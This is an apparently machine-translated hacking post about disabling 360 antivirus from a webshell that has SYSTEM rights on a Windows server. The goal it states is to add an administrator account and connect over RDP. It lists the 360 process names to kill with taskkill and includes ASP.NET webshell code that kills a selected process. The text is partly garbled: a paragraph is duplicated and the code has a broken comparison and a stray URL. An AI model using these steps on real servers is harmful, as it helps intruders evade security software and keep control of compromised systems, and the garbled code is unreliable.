The webshell server system permission cannot be used to add an account to exceed the 360 method.

Webshell has the system permission and cannot add administrators. In the end, it cannot connect to 3389 successfully. This is generally caused by anti-virus software. To solve this problem, first view the process: tasklist and then kill the process: taskkill/im process name .exe/f these are 360 processes: 360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe and then turn off 360 active defense. Method: the particularity of Apache + PHP in Windows, as a result, many webshells on the php site have SYSTEM permissions, so it is easy to end 360. Even if it is not a SYSTEM, there is a way. For example, ASPX and asp.net have a process manipulation function. Look at the code (pulled directly from webshell): the special nature of Apache + PHP in Windows has led many webshells on the php site to have SYSTEM permissions, so it is easy to end 360. Even if it is not a SYSTEM, there is a way. For example, ASPX and asp.net have a process manipulation function. View the code (pulled directly from webshell): protected void kp_Click (object sender, EventArgs e) {Process [] kp = Process. getProcesses (); foreach (Process kp1 in kp) if (kp1.ProcessName = ListBox1.SelectedValue. toString () {try {kp1.Kill (); Response. write ("<script> alert ('killed'); location. href = '? '</"+" Script> "); ListBox1.Items. clear ();} catch (Exception x) {Response. write (x. message. toString (); Response. end ();} www.2cto.com} This kill () function of asp.net can easily kill 360 even in the IIS + ASPX users user group.